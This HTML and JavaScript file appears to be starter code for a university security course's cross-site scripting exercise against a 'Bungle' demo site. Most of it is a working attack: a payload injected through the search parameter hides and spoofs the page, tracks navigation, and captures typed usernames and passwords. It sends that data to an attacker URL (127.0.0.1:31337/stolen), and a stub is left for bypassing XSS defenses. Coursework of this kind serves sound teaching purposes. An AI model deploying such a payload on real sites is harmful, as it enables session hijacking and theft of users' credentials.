<meta charset="utf-8"><script src="http://ajax.googleapis.com/ajax/libs/jquery

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. // Extend this function:
5. function payload(attacker) {
6. function log(data) {
7. console.log($.param(data))
8. $.get(attacker, data);
9. }
10. function proxy(href) {
11. $("html").load(href, function(){
12.  
13. $("html").show();
14. log({event: "nav", uri: href});
15. });
16. }
17. $("html").hide();
18. history.replaceState({}, "Bungle!", "/");
19. alert('go');
20. proxy("./");
21. $(function(){
22. $("#log-in-btn").click(function(e){
23. log({event: "login", user: $("#username").val(), pass: $("#userpass").val()});
24. });
25. });
26. }
27. function makeLink(xssdefense, target, attacker) {
28. if (xssdefense == 0) {
29. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
30. encodeURIComponent("<script" + ">" + payload.toString() +
31. ";payload(\"" + attacker + "\");</script" + ">");
32. } else {
33. // Implement code to defeat XSS defenses here.
34. }
35. }
36. var xssdefense = 0;
37. var target = "http://bungle-cs461.cs.illinois.edu/";
38. var attacker = "http://127.0.0.1:31337/stolen";
39. $(function() {
40. var url = makeLink(xssdefense, target, attacker);
41. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
42. });
43. </script>
44. <h3></h3>